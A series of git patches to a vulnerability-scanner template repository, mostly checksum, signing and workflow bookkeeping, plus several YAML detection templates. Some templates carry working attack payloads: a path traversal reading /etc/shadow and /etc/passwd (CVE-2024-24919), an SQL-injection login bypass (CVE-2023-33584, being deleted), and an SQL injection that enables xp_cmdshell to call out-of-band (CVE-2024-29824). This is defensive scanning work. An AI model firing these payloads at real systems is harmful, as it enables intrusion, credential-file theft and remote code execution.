http/cves/2023/CVE-2023-43374.yaml:f65d0fd722479f51ef71a6ea57cdba8cc2e9b4a9 -http/cves/2023/CVE-2023-43472.yaml:1bc8a97e7f1016f17698b7d447526963b51ecc8c +http/cves/2023/CVE-2023-43472.yaml:02352f22f7347c7ca98b3eb51d6851fcba2f0b40 http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 @@ -3255,7 +3256,7 @@ http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2 http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a http/cves/2024/CVE-2024-0235.yaml:662cd334f1c4420211126b256e502026c87670f2 -http/cves/2024/CVE-2024-0250.yaml:f35ece76d458046b1454babf9d325e837cc52048 +http/cves/2024/CVE-2024-0250.yaml:6c3af92318ecc3aa61773c511ad97c749442f47b http/cves/2024/CVE-2024-0305.yaml:066fc036c2ea567923f4983ccfcc447009354020 http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 @@ -8644,7 +8645,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a94b75e60a3a2a2ca32a25b0841b1f88b7783db8 +templates-checksum.txt:72430e9d9f7d17556c9f161a656a2f01e1a0f97c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6b4008c57865b308d67a6c8b2688fd1075e046b2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 19:03:42 +0000 Subject: [PATCH 0158/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3922cd2262..243873b07b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,12 +3,14 @@ on: push: paths: - '.new-additions' + - 'cloud/aws/sns/sns-public-subscribe-access.yaml' - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2023/CVE-2023-6786.yaml' + - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' From 2a9226d88cdaf652e7a97869a730a95053d14045 Mon Sep 17 00:00:00 2001 From: zy9ard3 <67743789+zy9ard3@users.noreply.github.com> Date: Wed, 12 Jun 2024 11:09:52 +0530 Subject: [PATCH 0159/1841] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index a92dc09e7c..4dbefaeb15 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -28,7 +28,7 @@ http: Host: {{Hostname}} Accept-Encoding: gzip - aCSHELL/../../../../../../../etc/shadow + aCSHELL/../../../../../../../etc/passwd matchers-condition: and matchers: @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950 From 0dcd220812251a3210eda5e7c1244a8c88b1b965 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jun 2024 13:59:31 +0530 Subject: [PATCH 0160/1841] Delete http/cves/2019/CVE-2019-12616.yaml --- http/cves/2019/CVE-2019-12616.yaml | 75 ------------------------------ 1 file changed, 75 deletions(-) delete mode 100644 http/cves/2019/CVE-2019-12616.yaml diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml deleted file mode 100644 index 7cbfedfc3e..0000000000 --- a/http/cves/2019/CVE-2019-12616.yaml +++ /dev/null @@ -1,75 +0,0 @@ -id: CVE-2019-12616 - -info: - name: phpMyAdmin <4.9.0 - Cross-Site Request Forgery - author: Mohammedsaneem,philippedelteil,daffainfo - severity: medium - description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement. - impact: | - An attacker can trick an authenticated user into performing unintended actions on the phpMyAdmin application. - remediation: | - Upgrade phpMyAdmin to version 4.9.0 or later to mitigate the CSRF vulnerability. - reference: - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 - - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00005.html - - http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00017.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2019-12616 - cwe-id: CWE-352 - epss-score: 0.01696 - epss-percentile: 0.87724 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: phpmyadmin - product: phpmyadmin - shodan-query: - - http.title:"phpmyadmin" - - http.component:"phpmyadmin" - - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" - fofa-query: - - title="phpmyadmin" - - body="pma_servername" && body="4.8.4" - google-query: intitle:"phpmyadmin" - hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve2019,cve,csrf,edb,phpmyadmin - -http: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version, '< 4.9.0') - - - type: word - words: - - "phpmyadmin.net" - - "phpMyAdmin" - condition: or - - - type: status - status: - - 200 - - 401 # password protected - - extractors: - - type: regex - name: version - group: 1 - regex: - - '\?v=([0-9.]+)' - internal: true - - - type: regex - group: 1 - regex: - - '\?v=([0-9.]+)' -# digest: 4b0a00483046022100f853d2dd0ea4cab7aead99ca58f1f56e4e1d7cfcfca88f15e059977db1ab99610221009302efaf4b299fb928e7082fc13feb5384d3980bbc1c0de911d8b036c160f45a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f8a97b038f8ee17e0f43d8ecb887dc9ca53e0f51 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 12 Jun 2024 10:03:25 +0000 Subject: [PATCH 0161/1841] Auto Generated New Template Addition List [Wed Jun 12 10:03:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ecb49f915f..fe3b6dda30 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-23692.yaml +http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml From 9f5b6192be9bd99fc52dd7b6312920569674734c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 10:03:32 +0000 Subject: [PATCH 0162/1841] Auto Generated Templates Checksum [Wed Jun 12 10:03:32 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2350a69f16..4c5eec17e0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3290,7 +3290,7 @@ http/cves/2024/CVE-2024-23692.yaml:aed80d269b633036a75391e6e5524265d83714d8 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c -http/cves/2024/CVE-2024-24919.yaml:32ba8338c24aa5d9b6bc4780c00087a850faabe8 +http/cves/2024/CVE-2024-24919.yaml:401efd596b5ca233c65ba9fb50203b2e297d24ce http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 @@ -8645,7 +8645,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:72430e9d9f7d17556c9f161a656a2f01e1a0f97c +templates-checksum.txt:d9f622f9b96ce9a0d3ade9c482c0c07114e1a631 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cbbf98de44d27b1bd3e3072bd373ce362c857694 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 12 Jun 2024 10:04:20 +0000 Subject: [PATCH 0165/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 243873b07b..6c4d4882a8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' - 'http/exposed-panels/wildix-collaboration-panel.yaml' From 0f9a99e2fef3bfb16900d4de5329d64bf3746aa8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 10:05:12 +0000 Subject: [PATCH 0166/1841] Auto Template Signing [Wed Jun 12 10:05:12 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 4dbefaeb15..9827767cec 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009afc265207776c9f9b1141fe6d3ee1d95636a46c187f30031ad4d91454e24c80022074c76d77fa0af466c7c78777681ecec941e3bd46946c9604f7e24a476aa1617e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8e7f5da2c13a6d6704e9aa66de4da686f5170783 Mon Sep 17 00:00:00 2001 From: Adam Chovanec Date: Wed, 12 Jun 2024 13:06:21 +0200 Subject: [PATCH 0167/1841] add detection for mikrotik SSH --- network/detection/mikrotik-ssh-detect.yaml | 32 ++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 network/detection/mikrotik-ssh-detect.yaml diff --git a/network/detection/mikrotik-ssh-detect.yaml b/network/detection/mikrotik-ssh-detect.yaml new file mode 100644 index 0000000000..71c5c9c687 --- /dev/null +++ b/network/detection/mikrotik-ssh-detect.yaml @@ -0,0 +1,32 @@ +id: mikrotik-ssh-detect + +info: + name: MikroTik RouterOS SSH - Detect + author: staticnoise + severity: info + description: | + MikroTik RouterOS SSH was detected. + + reference: + - http://www.openwall.com/lists/oss-security/2016/08/01/2 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 + - http://seclists.org/fulldisclosure/2016/Jul/51 + - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: network,mikrotik,detect,detection,tcp + +tcp: + - host: + - "{{Hostname}}" + port: 22 + + matchers: + - type: regex + regex: + - '(?i)SSH-2.0-ROSSSH' +# digest: 4b0a00483046022100a2f739b5d172666666e2087baacfe59d3df55a3ee81fa0ebfecda07f2ae2a920022100eb49ed7935e0ce621e1b7082cfbf8ac5d759866cd38f9443cb79f2899a5192d4:5ee180a688096af8a060049f233bbfa9 From fd3c85de40ebc473ebc85789b448f728fcea7ee5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jun 2024 17:32:51 +0530 Subject: [PATCH 0168/1841] Delete http/cves/2023/CVE-2023-33584.yaml --- http/cves/2023/CVE-2023-33584.yaml | 49 ------------------------------ 1 file changed, 49 deletions(-) delete mode 100644 http/cves/2023/CVE-2023-33584.yaml diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml deleted file mode 100644 index 016e70a4ca..0000000000 --- a/http/cves/2023/CVE-2023-33584.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2023-33584 - -info: - name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass - author: r3Y3r53 - severity: critical - description: | - Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. - reference: - - https://www.exploit-db.com/exploits/51501 - - https://nvd.nist.gov/vuln/detail/CVE-2023-33584 - - https://packetstormsecurity.com/files/cve/CVE-2023-33584 - - https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html - - https://github.com/akarrel/test_enrollment - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-33584 - cwe-id: CWE-89 - epss-score: 0.06893 - epss-percentile: 0.93907 - cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: enrollment_system_project - product: enrollment_system - tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project - -http: - - raw: - - | - POST /enrollment/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username='+or+1%3D1+%23&password={{randstr}} - - | - GET /enrollment/index.php?page=home HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")' - - 'contains(content_type, "text/html")' - - 'status_code == 200' - condition: and -# digest: 490a0046304402206aaa84cea2c1bd95ad50ada9f31acf013411b7cc186218000d599f6a5fcb5f4c0220475a15acd3ca7129f3a4a37fa8f08f102f77fe30ab802737f61c6585f97452a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a1f03b6b893e218a3e60e8317a77880c830be419 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jun 2024 17:50:42 +0530 Subject: [PATCH 0169/1841] Update bsphp-info.yaml --- http/vulnerabilities/bsphp-info.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/bsphp-info.yaml b/http/vulnerabilities/bsphp-info.yaml index ae8af9442a..49d566a89e 100644 --- a/http/vulnerabilities/bsphp-info.yaml +++ b/http/vulnerabilities/bsphp-info.yaml @@ -22,6 +22,7 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '{"data":' - '"id"' @@ -29,7 +30,7 @@ http: condition: and - type: word - part: header + part: content_type words: - 'application/json' From c81308329af88726eaf5315ea58078c60ad0c6b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jun 2024 18:01:33 +0530 Subject: [PATCH 0170/1841] fix-fp --- http/exposures/files/sendgrid-env.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index f34671bdfd..3bcdb10923 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -16,9 +16,17 @@ http: path: - "{{BaseURL}}/sendgrid.env" - extractors: + matchers-condition: and + matchers: - type: regex part: body regex: - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' -# digest: 490a00463044022033f2cda8d56c0ee6e11544acd36f9b4de05eb5a416f31b97c5be85d60d4bad210220347c49282a6f53c12d84fd1639b7f9f5e1e19e993a7171265c5490a36ed1c0e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - type: status + status: + - 429 + negative: true + + +# digest: 490a00463044022033f2cda8d56c0ee6e11544acd36f9b4de05eb5a416f31b97c5be85d60d4bad210220347c49282a6f53c12d84fd1639b7f9f5e1e19e993a7171265c5490a36ed1c0e1:922c64590222798bb761d5b6d8e72950 From 227f04335f46fabffed4cd91c8008194791cef44 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 15:38:48 +0000 Subject: [PATCH 0172/1841] Auto Generated Templates Checksum [Wed Jun 12 15:38:48 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4c5eec17e0..2f44abc7af 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1568,7 +1568,6 @@ http/cves/2019/CVE-2019-12461.yaml:e59515dfc19f812aafa8c4b0bdad9c28b65ff574 http/cves/2019/CVE-2019-12581.yaml:4976f8da6fe13e4c03cb2f2506e62d3514f1caf8 http/cves/2019/CVE-2019-12583.yaml:839bb71239abe5bf41aad959223aad3708482b5b http/cves/2019/CVE-2019-12593.yaml:45f42d7bde073d8d5816704a3ae55bb13f23f29f -http/cves/2019/CVE-2019-12616.yaml:53bb4f78becf29072c0d6061584881a0317f946f http/cves/2019/CVE-2019-12725.yaml:eb150ec0f37948a8e69b924d384e5f3f5d8a53a8 http/cves/2019/CVE-2019-12962.yaml:586ef7731c9c7fe252f5d4c16fcbe8a0614c59b5 http/cves/2019/CVE-2019-12985.yaml:d88bffd3b338219c549900b5dd1447423594bc99 @@ -3290,7 +3289,7 @@ http/cves/2024/CVE-2024-23692.yaml:aed80d269b633036a75391e6e5524265d83714d8 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c -http/cves/2024/CVE-2024-24919.yaml:401efd596b5ca233c65ba9fb50203b2e297d24ce +http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 @@ -4071,6 +4070,7 @@ http/exposed-panels/lockself-panel.yaml:ef2b3e7c48d573a249ed8826a9f8bb6bdd987e93 http/exposed-panels/logitech-harmony-portal.yaml:69cc40fd25e4e7867daab68752010203ebdeee6f http/exposed-panels/lomnido-panel.yaml:2c89cff24201fd062f22a862cc355669c88abd85 http/exposed-panels/looker-panel.yaml:04d97b828d5790c6cc5bff054c879585076e81fe +http/exposed-panels/lorex-panel.yaml:1bbe6bb943ada25c00e8bcf6dce53245b0cbf1b7 http/exposed-panels/loxone-panel.yaml:4c6bf3f67c3f8d1682743d09cd03dac23e48c3e2 http/exposed-panels/lucee-login.yaml:9efd53dd2d547f07bde709bf493771c9837afb6c http/exposed-panels/luci-login-detection.yaml:f16e1d9f3c21bf6ccb248ca774e365fa573f4dbe @@ -4891,7 +4891,7 @@ http/exposures/files/salesforce-credentials.yaml:8504267e3b48c5edb544e0d44acb048 http/exposures/files/sass-lint.yaml:08c9927bf6ceef823413d6996074d9e83295c7ba http/exposures/files/secret-token-rb.yaml:f504f7560705207dc75f7e3921a7c903c0b39a0a http/exposures/files/secrets-file.yaml:8939750a85103d1021bc0fbe40240a5ebb053e2d -http/exposures/files/sendgrid-env.yaml:5c33beee7fd3e289bddb7000f7a9720ab8278884 +http/exposures/files/sendgrid-env.yaml:bf8735793679ef535ff15c4887ae5c7f7e558419 http/exposures/files/sensitive-storage-exposure.yaml:e3b66315f9107f0ed2d27faab772309a600b345e http/exposures/files/service-account-credentials.yaml:513b67ee72fc5e1b6422688222442d14b1885eb5 http/exposures/files/shellscripts.yaml:835c1037da9bff93cd85ba8980aa75c5abaa5949 @@ -8645,7 +8645,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d9f622f9b96ce9a0d3ade9c482c0c07114e1a631 +templates-checksum.txt:7f048c15f9ba729b8a067a87a3e2a347ea24261c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0e5edf2541593afccd924fa5aa5f6529f2eb05dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 15:41:04 +0000 Subject: [PATCH 0173/1841] Auto Template Signing [Wed Jun 12 15:41:04 UTC 2024] :robot: --- http/exposed-panels/lorex-panel.yaml | 1 + http/exposures/files/sendgrid-env.yaml | 4 +--- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/lorex-panel.yaml b/http/exposed-panels/lorex-panel.yaml index dbd2c74b79..260e0bbe09 100644 --- a/http/exposed-panels/lorex-panel.yaml +++ b/http/exposed-panels/lorex-panel.yaml @@ -31,3 +31,4 @@ http: - 'contains_all(tolower(body), "web service", "lorex")' - 'contains_any(body, "/LOREX_webplugin", "lorex_msg")' condition: or +# digest: 4a0a00473045022026d054c88eb7bc233c419117527f732e2fcbbf3f28e2c8899e4a9c51078f1adf022100ee6e4c071d37ecae4ef43402b5f0f6dab71a05d82b710a7739b1ab53c29bdcaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index 3bcdb10923..975009dc54 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -27,6 +27,4 @@ http: status: - 429 negative: true - - -# digest: 490a00463044022033f2cda8d56c0ee6e11544acd36f9b4de05eb5a416f31b97c5be85d60d4bad210220347c49282a6f53c12d84fd1639b7f9f5e1e19e993a7171265c5490a36ed1c0e1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From eb25afe7db27f5011d6ff4c93da1832da5257273 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jun 2024 22:50:20 +0530 Subject: [PATCH 0175/1841] Create CVE-2024-29824.yaml --- http/cves/2024/CVE-2024-29824.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29824.yaml diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml new file mode 100644 index 0000000000..65836e797d --- /dev/null +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-29824 + +info: + name: Ivanti EPM SQL Remote Code Execution via SQL Injection + author: DhiyaneshDK + severity: high + description: | + An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. + reference: + - https://github.com/horizon3ai/CVE-2024-29824 + - https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/ + tags: cve,cve2024,ivanti,epm,sqli,rc + +http: + - raw: + - | + POST /WSStatusEvents/EventHandler.asmx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/soap+xml + + + + + + string + + + GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'-- + + + + + + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'application/soap+xml' + + - type: status + status: + - 200 From caee4562611c93e3e23bd9055a7717d427bc0e2a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 17:20:24 +0000 Subject: [PATCH 0176/1841] Auto Generated Templates Checksum [Wed Jun 12 17:20:24 UTC 2024] :robot: --- templates-checksum.txt | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2f44abc7af..fdbc20bfc5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3054,7 +3054,6 @@ http/cves/2023/CVE-2023-33440.yaml:9ffe9d8e6e4974614215b8beb8c8aba10db07dfa http/cves/2023/CVE-2023-3345.yaml:aabe8c491d1bea611b75c123b469b4c968571fa9 http/cves/2023/CVE-2023-33510.yaml:6db13769fa328f1cf80d6f5fb6adcdc9b8f1f53a http/cves/2023/CVE-2023-33568.yaml:785724178bb0f9cbb97d985c085d3d038efa75e9 -http/cves/2023/CVE-2023-33584.yaml:77d714a7b592d8ba4975902502a902e91567dd97 http/cves/2023/CVE-2023-33629.yaml:50b5034e3cc19561694c3aa213d4c0d53013b6cf http/cves/2023/CVE-2023-3368.yaml:a8ff1548e219ee4de8587c1b1f37207efcdbb22d http/cves/2023/CVE-2023-33831.yaml:e6d20c47f0fdd4c0d5fdfc162920edfa3a997ff4 @@ -4070,7 +4069,7 @@ http/exposed-panels/lockself-panel.yaml:ef2b3e7c48d573a249ed8826a9f8bb6bdd987e93 http/exposed-panels/logitech-harmony-portal.yaml:69cc40fd25e4e7867daab68752010203ebdeee6f http/exposed-panels/lomnido-panel.yaml:2c89cff24201fd062f22a862cc355669c88abd85 http/exposed-panels/looker-panel.yaml:04d97b828d5790c6cc5bff054c879585076e81fe -http/exposed-panels/lorex-panel.yaml:1bbe6bb943ada25c00e8bcf6dce53245b0cbf1b7 +http/exposed-panels/lorex-panel.yaml:61a776c9070e959990cd20261aa3b9b64ecf61c2 http/exposed-panels/loxone-panel.yaml:4c6bf3f67c3f8d1682743d09cd03dac23e48c3e2 http/exposed-panels/lucee-login.yaml:9efd53dd2d547f07bde709bf493771c9837afb6c http/exposed-panels/luci-login-detection.yaml:f16e1d9f3c21bf6ccb248ca774e365fa573f4dbe @@ -4891,7 +4890,7 @@ http/exposures/files/salesforce-credentials.yaml:8504267e3b48c5edb544e0d44acb048 